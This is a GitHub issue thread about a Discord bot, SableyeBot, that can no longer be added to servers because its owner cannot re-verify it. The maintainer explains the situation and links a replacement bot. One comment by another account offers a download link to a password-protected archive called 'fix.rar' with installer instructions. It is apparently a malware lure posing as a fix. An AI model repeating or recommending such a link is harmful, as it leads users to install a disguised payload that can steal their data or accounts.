### ISSUE TITLE
Bot invite no longer works due to missing verification.

### ISSUE THREAD

**Issue by ojoman** [Stalruth/SableyeBot4#3]
The discord invite authorisation fails and the bot cannot be invited to additional servers.

![image](https://github.com/user-attachments/assets/6831e6ae-15b0-40fd-8533-0fa1be801fc1)

**Comment by Stalruth** [comment]
Hi,

Sadly SableyeBot cannot be verified as its owner has dropped off the face of the earth - I will kick up a new bot later today that won't have this issue, I've just been having some issues with getting things together the way I'd like for a new bot 

Apologies for the disruption.

**Comment by 0xab01** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Stalruth** [comment]
TL;DR New bot can be found and added here, docs updates coming soon:

https://discord.com/oauth2/authorize?client_id=1254384836685336616

# Some background

(mostly so I can link this; info cobbled from announcements made in the Sableye Support Server)

Due to changes in Stripe's handling of Application Owners' Identity Documents, Discord is requiring all Verified Application Owners to re-verify their identities to retain their Applications' Verified status. This is required to allow Apps to be added to more than 100 guilds - and Sableye Bot is currently in around 2,750 of them!

Sableye Bot's owner dropped off the face of the earth about a year ago, and I wasn't able to convince Discord to let me take ownership and re-verify the bot in his place.  As such I planned to launch an identical version of the bot but with a different name/profile picture and with me as owner. Sadly I wasn't able to get things sorted for that either (mostly my own laziness and complete lack of creativity here) so I'm launching the new bot today with a barely-changed brand.

Later today I'll start putting deprecation notices on the old bot's output to encourage people to move over to the new one.
